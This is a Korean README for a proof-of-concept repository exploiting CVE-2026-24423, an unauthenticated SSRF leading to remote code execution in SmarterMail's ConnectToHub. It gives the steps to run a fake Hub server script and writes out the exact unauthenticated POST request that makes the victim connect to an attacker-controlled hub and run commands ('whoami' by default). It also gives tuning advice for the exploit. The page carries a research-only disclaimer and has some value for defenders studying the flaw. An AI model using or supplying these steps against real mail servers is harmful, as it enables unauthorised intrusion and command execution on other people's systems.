
CVE-2026-24423 재현 스크립트 — SmarterMail ConnectToHub의 신뢰 경계 위반으로 인한 SSRF 및 잠재적 원격 코드 실행 취약점입니다. 시뮬레이션된 Hub 서버와 취약한 API를 트리거하기 위한 지침이 포함되어 있습니다.
# CVE-2026-24423 – 재현
> ⚠️ **보안 연구 및 승인된 테스트 전용 / For security research and authorized testing only**
## 개요(Overview)
이 프로젝트는 **CVE-2026-24423** 취약점을 재현하기 위한 것입니다.
해당 취약점은 **SmarterMail ConnectToHub** 기능에 존재하며, 근본 원인은 다음과 같습니다:
- 관리자 수준 인터페이스에 인증이 없음
- 서버가 사용자가 지정한 Hub에 능동적으로 연결함(SSRF)
- 외부 Hub가 반환한 데이터가 로컬 시스템 수준 작업에 직접 사용됨
이 취약점은 **설계 수준의 신뢰 경계 위반(Trust Boundary Violation)** 에 해당하며, 궁극적으로 원격 코드 실행으로 이어질 수 있습니다.
이 저장소는 **취약점 검증 및 기술 연구 전용**이며, 무기화된 악용을 위한 것이 아닙니다.
Start Hub Simulation Server
python3 cve-2026-24423.py
이 스크립트는 다음을 수행합니다:
SystemMount 구성을 포함한 JSON 응답 반환Trigger the Vulnerable API
Yakit 또는 Burp Suite를 사용하여 요청 전송:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}
이 인터페이스는 인증이 필요하지 않습니다. No authentication is required.
Troubleshooting
취약점 재현에 실패한 경우:
cve-2026-24423.py의 MountPath 매개변수를 수정하세요.Result
취약점 트리거에 성공하면 SmarterMail은 Hub가 반환한 데이터를 해석하며, 기본 코드는 whoami 명령만 실행합니다.
예시 스크린샷 / Example:

이 프로젝트는 ChatGPT에 의해 완성되었습니다.